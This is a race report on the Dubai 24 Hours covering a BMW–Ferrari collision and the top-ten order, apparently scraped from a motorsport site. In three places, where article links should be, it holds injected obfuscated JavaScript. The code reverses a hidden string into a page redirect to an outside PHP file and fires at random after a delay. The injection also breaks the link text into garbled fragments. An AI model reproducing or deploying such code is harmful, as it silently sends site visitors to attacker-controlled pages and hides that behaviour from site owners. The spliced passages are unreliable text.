It was the collision between the #12 Saudi Falcons BMW Z4 and the #20 RAM Racing (ironic, no?) Ferrari however that got most tongues wagging throughout the paddock. Not only had one of the frontrunners come to blows with the event’s newest team (the Dubai 24hrs marked $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-track/ram-racing-star-driver-line-up-dubai-24hrs/” target=”_blank”>RAM Racing’s first event), but neither the Falcon’s Dominik Baumann (AU) nor RAM’s Johnny Mowlem (UK) could decide who was at fault.
Touring at slower speeds under the sixth Code 60 of the event (an alternative to the Safety Car where a 60kph speed limit stands), Mowlem was sure he saw a green light, and booted it. Baumann, positive the event was still under yellows, continued to weave across the circuit to warm his tyres. Cue retirement for the #12 car after a spin into the Armco that cracked the headers, and a long hard look at the RAM’s Ferrari 458 front suspension.
Problems had so far been kept at bay for the sister $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-track/saudi-falcons-porsche-gt3-cup-middle-east-dubai-video/” target=”_blank”>Saudi Falcons BMW, which had just retaken the lead as the seventh hour ticked by. Pro-Am leaders Stadler were still breathing down their necks, swiftly followed by the Dragon Racing Ferrari 458…
…both Black Falcon cars Mercedes, and the #16 $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-track/gulf-12hrs-dec-2012-par-for-the-af-corse/” target=”_blank”>AF Corse Ferrari 458 (driven by Lorenzo Carvalho, Lorenzo Case, Marco Cioci, Stephane Lemeret and former-Formula One driver Mika Salo).
Early lead threateners Craft Racing AMR, despite a hold up during the pit stops, were still in seventh with the #15 Aston Martin Vantage GT3 (Darren Turner, Frank Yu, Tomonobu Fuijiii and Darryl O’Young)…
…just ahead of the JLOC Lamborghini Gallardo LP600 (Manabu Orido, Takayuki Aoki, Hideki Yamauchi and Yuuya Sakamoto) and the Lapidus Racing McLaren MP4-12C (Klaas Hummel, Adam Christodoulou, Phil Quaife and Tim Mullen).
Four different manufacturers held the top four positions, and seven held the top ten spots. As darkness fell, predictions were few and far between.
